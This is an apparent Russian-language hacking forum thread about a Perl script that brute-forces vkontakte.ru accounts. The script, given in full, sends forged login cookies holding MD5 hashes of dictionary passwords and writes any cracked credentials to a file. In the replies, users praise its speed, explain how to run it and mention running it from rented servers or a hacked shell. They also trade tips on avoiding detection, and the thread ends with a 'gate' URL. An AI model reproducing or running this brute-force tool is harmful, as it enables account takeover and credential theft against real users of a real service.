vkontakte brutforce

Code:

#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt';		#словарь паролей
$id = 111111;		#id цели
$mail = 'mail%40mail.com';	#мыло, вместо @ вписать %40
$threads = 4;		#количество потоков
######################################

open (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
	"Host: vkontakte.ru\r\n".
            "Accept: */*\r\n".
            "Content-Type: application/x-www-form-urlencoded\r\n".
            "User-Agent: Mozillo\r\n".
            "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
            "Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass  $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
	my (@mas);
	while (<pass>){
	push @mas, $_;
	last if (@mas == 400);
	}
	chomp @mas;
	return @mas;
}

 

Супер.. ништяк.. скорость отпад.. даже на неполных 256 кб/с
респект!

 

Gui версии уже как 2 месяца... а вы перл юзаете

 

а нах гуи под консолью, темболее когда сеть дедиков брутит?

 

Выложи сюда ссылки пож

 

А как это все юзать?

 

Установи Active Perl если для окошек (ну или серв какой нить если оч хоцца), сохрани текс кода в файл Brut.pl, и запусти, отредактировав входные данные (мыло/йд/файлспассами), как вариант залей на шелл..

 

С активперла с проксями может не сработать вроде... О_о Если я ошиблась, поправьте) Именно этот плоит не юзала, каюсь)

 

Просто ради теста прогоняю со своей тачки без проксей: один пароль сдался через 2 минуты, другой минут 20 брутился, пока в ответку Outpost не сообщил:

06.02.2008 23:37:58 Сканирование портов 195.190.105.235 TCP (4084, 4082, 4083, 4080, 4074, 4075)
06.02.2008 23:37:58 Rst атака 195.190.105.235 -> 195.190.105.235

195.190.105.235 = vkontakte.ru ))
Вот так вот, vkontakte.ru практикует DOS-атаки своих пользователей? А вдруг я свой забытый пароль перебираю? Беспредельщики!
Короче смотрите на палитесь, а то еще забанят.

 

хм..я у себя в виде теста брутил..и ниче мне на мыло не пришло..хм

 

кстати да))в виде теста в строчке "$id = 111111" сотрите 5 едениц..клин клином вышибают

 

Grini
А тебе и не должно ничего на мыло приходить.

 

а зачем там мыло писать надо?
И вытикающий вопрос)Где появляется пасс?

 

читай скрипт
good, '>>good.txt');

следовательно в фаиле good.txt))

 

почему же он мой пароль не распознает?)я на себе тестю,а он пробегает мой пароль,пишет ок и все)где этот гуд.ТиксТ появляется?в папке с самим файликом как я понимаю должен,но его нет
кстати скрипт русские буквы,запятые распознает?может причина в этом?

 

читаем первый пост внимательнее

 

Grini

Исходник почитай хотя бы, прежде чем запускать.
Мыло на вконтакте.ру используется в качестве логина. Скрипт посылает серверу запрос подсовывая левые куки : [ид, мыло, мд5(пароля)]. Когда сервер даёт добро, скрипт завершает работу и пишет отчет в good.txt
Видимо ты даешь неправильные данные (ид, мыло или пароль)

 

спасибо,разобрался

 

Упс

 

ужс какой



гейт: www.poncher.110mb.com/my/rtest/e.php